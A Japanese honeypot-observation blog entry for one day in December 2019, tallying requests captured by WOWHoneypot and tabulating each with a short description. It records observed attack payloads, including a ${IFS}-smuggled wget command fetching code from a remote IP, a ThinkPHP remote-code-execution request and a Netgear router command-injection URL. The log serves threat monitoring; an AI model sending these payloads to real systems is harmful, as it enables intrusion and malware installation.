23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(262日目)

2019/12/03(火)

トータルは6831件でした。

ハンティングログは以下です。

201.87.243[.]142 wget${IFS}-qO-${IFS}hxxp[:]//205.185.115[.]72/b

www.virustotal.com

件数 概要 リクエス
6736 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
58 アクセス GET /
6 調査 GET /script
5 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
4 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
2 stalkerportalの調査 GET /stalker_portal/server/adm/tv-channels/iptv-list-json
2 DGN1000 Netgear ルータを狙うMirai亜種の攻撃 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
2 管理者設定の調査 GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin
1 不正中継の調査 GET hxxp[:]//www.google.com/
1 調査 GET /version
1 FTPの設定情報の調査 GET /sftp-config.json?x=x
1 調査 GET /index.php
1 管理者設定の調査 GET /admin/config.php
1 cfgファイルの調査 GET /000000000000.cfg
1 不正中継の試み CONNECT www.google.com:443